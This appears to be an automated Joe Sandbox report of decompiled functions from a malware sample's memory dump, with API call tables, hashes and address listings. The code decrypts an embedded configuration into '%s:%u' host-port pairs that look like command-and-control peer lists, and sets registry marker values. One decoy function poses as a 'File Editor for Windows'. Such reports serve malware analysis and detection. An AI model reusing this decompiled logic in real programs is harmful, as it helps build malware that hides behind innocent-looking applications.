                                                                                                                                                                                                                                                                                                        										wnsprintfA(_v48 * 0x28 + _v40, 0x28, "%s:%u", _v52,  *(_v32 + 4 + _v48 * 6) & 0x0000ffff);
                                                                                                                                                                                                                                                                                                        										_t98 = _t98 + 0x20;
                                                                                                                                                                                                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                                                        										_v48 = _v48 + 1;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									 *_a4 = _v40;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}
























                                                                                                                                                                                                                                                                                                        0x04007976
                                                                                                                                                                                                                                                                                                        0x04007981
                                                                                                                                                                                                                                                                                                        0x04007987
                                                                                                                                                                                                                                                                                                        0x0400798e
                                                                                                                                                                                                                                                                                                        0x040079a3
                                                                                                                                                                                                                                                                                                        0x040079a9
                                                                                                                                                                                                                                                                                                        0x040079b0
                                                                                                                                                                                                                                                                                                        0x040079bf
                                                                                                                                                                                                                                                                                                        0x040079c6
                                                                                                                                                                                                                                                                                                        0x040079cd
                                                                                                                                                                                                                                                                                                        0x040079d2
                                                                                                                                                                                                                                                                                                        0x040079d5
                                                                                                                                                                                                                                                                                                        0x040079df
                                                                                                                                                                                                                                                                                                        0x040079ed
                                                                                                                                                                                                                                                                                                        0x04007a10
                                                                                                                                                                                                                                                                                                        0x04007a15
                                                                                                                                                                                                                                                                                                        0x04007a1a
                                                                                                                                                                                                                                                                                                        0x04007a29
                                                                                                                                                                                                                                                                                                        0x04007a38
                                                                                                                                                                                                                                                                                                        0x04007a51
                                                                                                                                                                                                                                                                                                        0x04007a58
                                                                                                                                                                                                                                                                                                        0x04007a5a
                                                                                                                                                                                                                                                                                                        0x04007a6c
                                                                                                                                                                                                                                                                                                        0x04007a84
                                                                                                                                                                                                                                                                                                        0x04007a8f
                                                                                                                                                                                                                                                                                                        0x04007a90
                                                                                                                                                                                                                                                                                                        0x04007a95
                                                                                                                                                                                                                                                                                                        0x04007abc
                                                                                                                                                                                                                                                                                                        0x04007ac2
                                                                                                                                                                                                                                                                                                        0x04007acb
                                                                                                                                                                                                                                                                                                        0x04007a69
                                                                                                                                                                                                                                                                                                        0x04007a69
                                                                                                                                                                                                                                                                                                        0x04007ad6
                                                                                                                                                                                                                                                                                                        0x04007ad6
                                                                                                                                                                                                                                                                                                        0x04007a58
                                                                                                                                                                                                                                                                                                        0x04007a1a
                                                                                                                                                                                                                                                                                                        0x04007ae3
                                                                                                                                                                                                                                                                                                        0x04007ae3
                                                                                                                                                                                                                                                                                                        0x040079b0
                                                                                                                                                                                                                                                                                                        0x04007aef

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,000075BC,00003000,00000004), ref: 040079A3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0400A400: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 0400A45C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0400A400: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0400A480
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0400A400: RegCloseKey.KERNEL32(00000000), ref: 0400A494
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04007AE3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 04008AD3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: GetLastError.KERNEL32 ref: 04008ADD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008B0C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 04008B37
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008B5E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 04008B7A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B87
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptDestroyKey.ADVAPI32(00000000), ref: 04008B91
                                                                                                                                                                                                                                                                                                          • Part of subcall function 04008A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008B9D
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007A4B
                                                                                                                                                                                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 04007A90
                                                                                                                                                                                                                                                                                                        • wnsprintfA.SHLWAPI ref: 04007ABC
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$CloseDecryptErrorFreeLastOpenQueryReleaseValueinet_ntoawnsprintf
                                                                                                                                                                                                                                                                                                        • String ID: %s:%u$Hogerfazwafx
                                                                                                                                                                                                                                                                                                        • API String ID: 1891311255-1052426064
                                                                                                                                                                                                                                                                                                        • Opcode ID: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                                                        • Instruction ID: d327848a4ae889dd371e71d646ee9b038911c4fd72f1be7e57aa30bfb263aa34
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79f967d1a52c2aaee155b9d7bfa010675069804c64fe547678c39a65b43ec606
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C410FB5E04208EBFB04DF94C945BEEBBB5EB88705F14C159E6057B2C0D779AA40CB64
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E04005E30(signed char _a4) {
                                                                                                                                                                                                                                                                                                        				char* _v8;
                                                                                                                                                                                                                                                                                                        				char _v9;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				char* _v24;
                                                                                                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v29;
                                                                                                                                                                                                                                                                                                        				int _v36;
                                                                                                                                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                                                                                                                                        				int _v72;
                                                                                                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                                                                                                        				long _t33;
                                                                                                                                                                                                                                                                                                        				long _t37;
                                                                                                                                                                                                                                                                                                        				char* _t45;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v9 = 0;
                                                                                                                                                                                                                                                                                                        				_t31 =  *0x40118a0; // 0x4013b88
                                                                                                                                                                                                                                                                                                        				_v8 = _t31;
                                                                                                                                                                                                                                                                                                        				_t45 =  *0x4011894; // 0x4013fc4
                                                                                                                                                                                                                                                                                                        				_v24 = _t45;
                                                                                                                                                                                                                                                                                                        				_v16 = 0x80000001;
                                                                                                                                                                                                                                                                                                        				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = 0x80000002;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                                                                                                                        				_t33 = RegOpenKeyExA(_v16, _v8, 0, 0xf003f,  &_v20); // executed
                                                                                                                                                                                                                                                                                                        				if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        					_v36 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v28 = 0x20;
                                                                                                                                                                                                                                                                                                        					_v29 = 0;
                                                                                                                                                                                                                                                                                                        					_t37 = RegQueryValueExA(_v20, _v24, 0, 0,  &_v68,  &_v28); // executed
                                                                                                                                                                                                                                                                                                        					if(_t37 == 0 && _v28 == 0x10) {
                                                                                                                                                                                                                                                                                                        						_v29 = 1;
                                                                                                                                                                                                                                                                                                        						if((_a4 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							RegDeleteValueA(_v20, _v24);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t48 = _v29 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if((_v29 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                                                        						_v72 = 0x10;
                                                                                                                                                                                                                                                                                                        						E04009BD0(_t48,  &_v68, 0x10);
                                                                                                                                                                                                                                                                                                        						RegSetValueExA(_v20, _v24, 0, 3,  &_v68, 0x10); // executed
                                                                                                                                                                                                                                                                                                        						_v9 = 1;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					RegCloseKey(_v20); // executed
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v9;
                                                                                                                                                                                                                                                                                                        			}

















                                                                                                                                                                                                                                                                                                        0x04005e36
                                                                                                                                                                                                                                                                                                        0x04005e3a
                                                                                                                                                                                                                                                                                                        0x04005e3f
                                                                                                                                                                                                                                                                                                        0x04005e42
                                                                                                                                                                                                                                                                                                        0x04005e48
                                                                                                                                                                                                                                                                                                        0x04005e4b
                                                                                                                                                                                                                                                                                                        0x04005e5b
                                                                                                                                                                                                                                                                                                        0x04005e5d
                                                                                                                                                                                                                                                                                                        0x04005e5d
                                                                                                                                                                                                                                                                                                        0x04005e64
                                                                                                                                                                                                                                                                                                        0x04005e7e
                                                                                                                                                                                                                                                                                                        0x04005e86
                                                                                                                                                                                                                                                                                                        0x04005e8c
                                                                                                                                                                                                                                                                                                        0x04005e93
                                                                                                                                                                                                                                                                                                        0x04005e9a
                                                                                                                                                                                                                                                                                                        0x04005eb2
                                                                                                                                                                                                                                                                                                        0x04005eba
                                                                                                                                                                                                                                                                                                        0x04005ec2
                                                                                                                                                                                                                                                                                                        0x04005ecc
                                                                                                                                                                                                                                                                                                        0x04005ed6
                                                                                                                                                                                                                                                                                                        0x04005ed6
                                                                                                                                                                                                                                                                                                        0x04005ecc
                                                                                                                                                                                                                                                                                                        0x04005edc
                                                                                                                                                                                                                                                                                                        0x04005ee2
                                                                                                                                                                                                                                                                                                        0x04005ee4
                                                                                                                                                                                                                                                                                                        0x04005ef1
                                                                                                                                                                                                                                                                                                        0x04005f0b
                                                                                                                                                                                                                                                                                                        0x04005f11
                                                                                                                                                                                                                                                                                                        0x04005f11
                                                                                                                                                                                                                                                                                                        0x04005f19
                                                                                                                                                                                                                                                                                                        0x04005f19
                                                                                                                                                                                                                                                                                                        0x04005f25

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.KERNEL32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Value$CloseDeleteOpenQuery
                                                                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                                                                        • API String ID: 647993726-227171996
                                                                                                                                                                                                                                                                                                        • Opcode ID: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 89e6ea7d5f7cd1f3b8914b5f239817843937aaeba4a6099ce7b548add1ef5737
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42940f5d5e5c91af521085ddcd9b03f77c986a907cdf4f49274909f40d6ddbf2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A317370A04249AFEF04CFD4D855BFFBBB9AB44704F14815CEA40B7281D7B96A00CBA1
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                                        			E04004AC0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t31;
                                                                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                        					__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                                                                                                                        						if( *((intOrPtr*)(_v8 + 8)) <= 0 || WaitForSingleObject( *(_v8 + 0x24), 0x64) != 0x102) {
                                                                                                                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                                                                                                                        							Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						EnterCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_v12 = 0;
                                                                                                                                                                                                                                                                                                        						_t31 = E04008250( *((intOrPtr*)(_v8 + 4)),  *((intOrPtr*)(_v8 + 8)),  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                                                                                        						_t50 = _t50 + 0x10;
                                                                                                                                                                                                                                                                                                        						_v16 = _t31;
                                                                                                                                                                                                                                                                                                        						LeaveCriticalSection(_v8 + 0xc);
                                                                                                                                                                                                                                                                                                        						if(_v16 <= 0) {
                                                                                                                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						E040062B0(_v20, _v16); // executed
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v20, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        						SetEvent( *(_v8 + 0x24));
                                                                                                                                                                                                                                                                                                        						__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                                        						goto L8;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				L8:
                                                                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                                                                        			}









                                                                                                                                                                                                                                                                                                        0x04004ac9
                                                                                                                                                                                                                                                                                                        0x04004ad0
                                                                                                                                                                                                                                                                                                        0x04004ad8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004ade
                                                                                                                                                                                                                                                                                                        0x04004ae5
                                                                                                                                                                                                                                                                                                        0x04004b80
                                                                                                                                                                                                                                                                                                        0x04004b85
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004b85
                                                                                                                                                                                                                                                                                                        0x04004b08
                                                                                                                                                                                                                                                                                                        0x04004b0e
                                                                                                                                                                                                                                                                                                        0x04004b15
                                                                                                                                                                                                                                                                                                        0x04004b32
                                                                                                                                                                                                                                                                                                        0x04004b37
                                                                                                                                                                                                                                                                                                        0x04004b3a
                                                                                                                                                                                                                                                                                                        0x04004b44
                                                                                                                                                                                                                                                                                                        0x04004b4e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004b58
                                                                                                                                                                                                                                                                                                        0x04004b6b
                                                                                                                                                                                                                                                                                                        0x04004b78
                                                                                                                                                                                                                                                                                                        0x04004b90
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04004b90
                                                                                                                                                                                                                                                                                                        0x04004ade
                                                                                                                                                                                                                                                                                                        0x04004b96
                                                                                                                                                                                                                                                                                                        0x04004b9b

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 04004AD8
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064), ref: 04004AF4
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(-0000000C), ref: 04004B08
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(-0000000C), ref: 04004B44
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04004B6B
                                                                                                                                                                                                                                                                                                        • SetEvent.KERNEL32(?), ref: 04004B78
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 04004B85
                                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 04004B90
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$EnterEventFreeInitializeLeaveObjectSingleSleepUninitializeVirtualWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3462651527-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                                        • Instruction ID: a8de0d0852ad7639ac4a8efdad63c4b5a832734fa442b81c8ae14f5e2abf7ac4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34458be81e427262741f71e07dfc47b0f17ea7c68782a946b32513cabd3e92be
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C213075A00208EFE704EF94D958FAEB7B9EB48305F10C658E605B7281D739EE84CB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E00401A9C(struct HWND__* _a4, int _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                                                                                                                        				signed int _v48;
                                                                                                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                                                                                                        				signed int _v56;
                                                                                                                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                                                                                                                        				struct HMENU__* _v64;
                                                                                                                                                                                                                                                                                                        				int _t52;
                                                                                                                                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                                                                                                                                        				struct HWND__* _t59;
                                                                                                                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                                                                                                                        				signed int _t92;
                                                                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t52 = _a8;
                                                                                                                                                                                                                                                                                                        				if(_t52 == 5) {
                                                                                                                                                                                                                                                                                                        					if(_a12 != 1) {
                                                                                                                                                                                                                                                                                                        						_t59 = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        						_v48 = 1;
                                                                                                                                                                                                                                                                                                        						_v52 = _a16 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        						_v56 = _a16 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        						_v60 = 0;
                                                                                                                                                                                                                                                                                                        						_v64 = 0;
                                                                                                                                                                                                                                                                                                        						 *(_t100 - 8) = _t59;
                                                                                                                                                                                                                                                                                                        						MoveWindow(??, ??, ??, ??, ??, ??);
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L29;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					if(_t52 > 5) {
                                                                                                                                                                                                                                                                                                        						if(_t52 == 0x10) {
                                                                                                                                                                                                                                                                                                        							DestroyWindow(_a4);
                                                                                                                                                                                                                                                                                                        							goto L29;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t52 == 0x111) {
                                                                                                                                                                                                                                                                                                        								_t66 = _a12 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                        								if(_t66 == 0x236e) {
                                                                                                                                                                                                                                                                                                        									E00401879(_a4, 0);
                                                                                                                                                                                                                                                                                                        									goto L25;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									if(_t66 > 0x236e) {
                                                                                                                                                                                                                                                                                                        										if(_t66 == 0x236f) {
                                                                                                                                                                                                                                                                                                        											PostMessageA(_a4, 0x10, 0, 0);
                                                                                                                                                                                                                                                                                                        											goto L25;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											if(_t66 == 0x2370) {
                                                                                                                                                                                                                                                                                                        												E00401879(_a4, 1);
                                                                                                                                                                                                                                                                                                        												goto L25;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										if(_t66 == 0x236d) {
                                                                                                                                                                                                                                                                                                        											MessageBoxA(0, "File Editor for Windows!\nCreated using the Win32 API", "About...", 0);
                                                                                                                                                                                                                                                                                                        											L25:
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								goto L29;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								if(_t52 == 7) {
                                                                                                                                                                                                                                                                                                        									 *(_t100 - 8) = GetDlgItem(_a4, 0x3e9);
                                                                                                                                                                                                                                                                                                        									SetFocus(??);
                                                                                                                                                                                                                                                                                                        									goto L29;
                                                                                                                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                                                                                                                        									goto L28;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t52 == 1) {
                                                                                                                                                                                                                                                                                                        							CreateWindowExA(0, "EDIT", 0x41f060, 0x50301004, 0x80000000, 0x80000000, 0x80000000, 0x80000000, _a4, 0x3e9, GetModuleHandleA(0), 0); // executed
                                                                                                                                                                                                                                                                                                        							_t92 = GetStockObject(0x11);
                                                                                                                                                                                                                                                                                                        							_v52 = 1;
                                                                                                                                                                                                                                                                                                        							_v56 = _t92;
                                                                                                                                                                                                                                                                                                        							_v60 = 0x30;
                                                                                                                                                                                                                                                                                                        							_v64 = 0x3e9;
                                                                                                                                                                                                                                                                                                        							 *((intOrPtr*)(_t100 - 0xffffffffffffffd0)) = _a4;
                                                                                                                                                                                                                                                                                                        							SendDlgItemMessageA(??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        							goto L29;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							if(_t52 == 2) {
                                                                                                                                                                                                                                                                                                        								PostQuitMessage(0);
                                                                                                                                                                                                                                                                                                        								L29:
                                                                                                                                                                                                                                                                                                        								_t53 = 0;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                                                                                                                        								_t53 = DefWindowProcA(_a4, _a8, _a12, _a16); // executed
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _t53;
                                                                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                                                                        0x00401aa4
                                                                                                                                                                                                                                                                                                        0x00401aaa
                                                                                                                                                                                                                                                                                                        0x00401ba5
                                                                                                                                                                                                                                                                                                        0x00401bc9
                                                                                                                                                                                                                                                                                                        0x00401bce
                                                                                                                                                                                                                                                                                                        0x00401bd6
                                                                                                                                                                                                                                                                                                        0x00401bda
                                                                                                                                                                                                                                                                                                        0x00401bde
                                                                                                                                                                                                                                                                                                        0x00401be6
                                                                                                                                                                                                                                                                                                        0x00401bee
                                                                                                                                                                                                                                                                                                        0x00401bf6
                                                                                                                                                                                                                                                                                                        0x00401bf8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ab0
                                                                                                                                                                                                                                                                                                        0x00401ab3
                                                                                                                                                                                                                                                                                                        0x00401acb
                                                                                                                                                                                                                                                                                                        0x00401ce8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401ad1
                                                                                                                                                                                                                                                                                                        0x00401ad6
                                                                                                                                                                                                                                                                                                        0x00401c2d
                                                                                                                                                                                                                                                                                                        0x00401c35
                                                                                                                                                                                                                                                                                                        0x00401c6b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c37
                                                                                                                                                                                                                                                                                                        0x00401c3c
                                                                                                                                                                                                                                                                                                        0x00401c4f
                                                                                                                                                                                                                                                                                                        0x00401caa
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c51
                                                                                                                                                                                                                                                                                                        0x00401c56
                                                                                                                                                                                                                                                                                                        0x00401c80
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00401c58
                                                                                                                                                                                                                                                                                                        0x00401c56
                                                                                                                                                                                                                                                                                                        0x00401c3e
                                                                                                                                                                                                                                                                                                        0x00401c43
                                                                                                                                                                                                                                                                                                        0x00401cd5
                                                                                                                                                                                                                                                                                                        0x00401cdb
